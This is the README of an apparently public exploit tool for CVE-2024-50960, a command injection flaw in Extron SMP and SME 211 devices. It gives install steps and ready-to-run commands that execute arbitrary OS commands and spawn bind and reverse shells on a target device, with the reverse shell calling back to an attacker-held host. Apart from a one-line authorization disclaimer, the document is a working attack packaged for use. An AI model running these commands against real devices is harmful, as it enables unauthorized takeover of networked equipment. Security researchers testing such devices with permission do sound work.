By Ryan Roth @f1rstm4tter www.layer8security.com
Advisory: CVE-2024-50960: Exploiting Extron SMP Command Injection
This tool exploits CVE-2024-50960 — OS command injection vulnerabilities in Extron SMP devices. It allows web admins to execute arbitrary commands and spawn shells (both bind and reverse) on the underlying OS.
Further analysis has revealed that the Extron SME 211 (firmware ≤ 3.02) is also vulnerable to CVE-2024-50960.
The advisory at the link above has been updated to reflect this finding.
To use this tool, you need Python 3.x and pip installed. Clone the repository and install the required packages:
git clone https://github.com/yourusername/extron-smp-inject.git
cd extron-smp-inject
pip install -r requirements.txtTo run the tool, use the following command:
python extron_smp_inject.py <action> [options]action: The action to perform (eithercommand,bind, orreverse).rhost: The target IP address (required).rport: The target port (80 or 443) (required).--username: The username for authentication (default:admin).--password: The password for authentication.-vor--verbose: Enable verbose logging.--log-file: Specify a log file to write logs to.
Execute an arbitrary command:
python extron_smp_inject.py command --password admin whoami 192.168.1.1 443Spawn a bind shell:
python extron_smp_inject.py bind --password admin 4444 192.168.1.1 443Spawn a reverse shell:
python extron_smp_inject.py reverse --password admin 192.168.0.1 4444 192.168.1.1 443The tool supports logging output to the console and optionally to a file. You can enable verbose logging using the -v option, which provides more detailed output during execution.
This project is licensed under the MIT License. See the LICENSE file for details.
Ensure you have proper authorization before testing devices. Unauthorized access is illegal.